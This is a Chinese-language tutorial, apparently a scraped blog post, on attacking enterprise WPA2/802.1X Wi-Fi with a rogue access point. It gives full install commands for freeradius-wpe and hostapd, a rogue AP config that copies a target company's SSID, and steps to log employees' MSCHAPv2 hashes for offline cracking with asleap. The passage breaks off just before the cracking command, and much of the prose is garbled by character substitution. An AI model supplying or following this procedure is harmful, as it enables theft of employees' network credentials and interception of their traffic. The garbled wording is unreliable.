针对开放式(没有暗码)无线网络的企业进攻,我小我私家感受较量经典的进攻方法有2种,一种是eviltwin,一种是karma。karma应该是eviltwin进攻手法的进级版,进攻者只需要简朴的监听客户端发的ssid探测和响应包就可以实现中间人了,受害者很少会有察觉。并且坊间曾有一个错误的认识,认为埋没的ssid是不受karma影响的。可是实际环境是,客户端假如曾经毗连过埋没的ssid,,也会广播这些网络的探测包。尽量karma这种进攻方法已经有10多年的汗青了,可是在MAC OSX,ubuntu,老版本的andorid系统上依然有效。win7的默认设置居然是防护karma进攻的。
对加密的无线网络,针对小我私家网络,许多是利用wpa2-psk预共享密钥的要领来限制会见。而公司的无线网络有利用wpa2企业认证的,也有利用radius处事提供独立的用户名和暗码来实现802.1x尺度认证的。
我这里是的进攻是利用hostapd饰演一个无线会见点,然后通过打补丁的freeraidus wpe来捕获暗码hash,最后用asleep来离线破解暗码,来反抗相对安详的利用radius处事器提供独立的用户名和暗码实现的802.1x认证的企业无线网络情况。
所需设备:
TP-LINK TL-WN821NKali 1.1.0
首先安装freeradius-wpe,既可以利用dpkg直接安装freeradius-server-wpe_2.1.12-1_i386.deb,也可以通过源码编译来安装,通过deb包安装要领的呼吁如下:
wget https://github.com/brad-anton/freeradius-wpe/raw/master/freeradius-server-wpe_2.1.12-1_i386.deb
dpkg --install freeradius-server-wpe_2.1.12-1_i386.deb
ldconfig
cd /usr/local/etc/raddb/certs
./bootstrap && ldconfig
通过源码安装的步调如下:
git clone https://github.com/brad-anton/freeradius-wpe.gitwget ftp://ftp.freeradius.org/pub/freeradius/freeradius-server-2.1.12.tar.bz2
tar jxvf freeradius-server-2.1.12.tar.bz2
patch -p1 < ../freeradius-wpe.patch
./configure
make install
然后执行radiusd -X开启debug模式验证是否安装乐成,假如运行此呼吁的时候提示
Failed binding to /usr/local/var/run/radiusd/radiusd.sock: No such file or directory
则需要成立相应的目次
[email protected]:/usr/local/etc/raddb/certs# mkdir -p /usr/local/var/run/radiusd/接下来安装hostapd,呼吁如下:
wget http://hostap.epitest.fi/releases/hostapd-2.0.tar.gztar zxvf hostapd-2.0.tar.gz
cd hostapd-2.0/hostapd/
cp defconfig .config
make
假如安装的时候提示:
../src/drivers/driver_nl80211.c:19:31: fatal error: netlink/genl/genl.h: No such file or directory
compilation terminated.
make: *** [../src/drivers/driver_nl80211.o] Error 1
则需要安装libnl开拓包,呼吁如下:
[email protected]:/hostapd-2.0/hostapd# sudo apt-get install libnl1 libnl-dev
然后编辑hostapd-wpe.conf文件,如下
interface=wlan0driver=nl80211
ssid=corp-lobby
country_code=DE
logger_stdout=-1
logger_stdout_level=0
dump_file=/tmp/hostapd.dump
ieee8021x=1
eapol_key_index_workaround=0
own_ip_addr=127.0.0.1
auth_server_addr=127.0.0.1
auth_server_port=1812
auth_server_shared_secret=testing123
auth_algs=3
wpa=2
wpa_key_mgmt=WPA-EAP
channel=1
wpa_pairwise=CCMP
rsn_pairwise=CCMP
实际操纵需要修改的处所只有ssid项,假如你的方针企业无线网络的ssid叫corp-lobby,则修改ssid=corp-lobby,运行 hostapd -dd hostapd-wpe.conf 开启伪造的无线热点
这时候假如有企业员工在你四周,他的手时机自动毗连你的伪造的无线热点,你就可以通过
tail -f /usr/local/var/log/radius/freeradius-server-wpe.log看到抓到的用户名和MSCHAPv2的响应hash和挑战hash。
有了challenge和response,就可以利用asleep东西来基于字典的暴力破解,呼吁如下
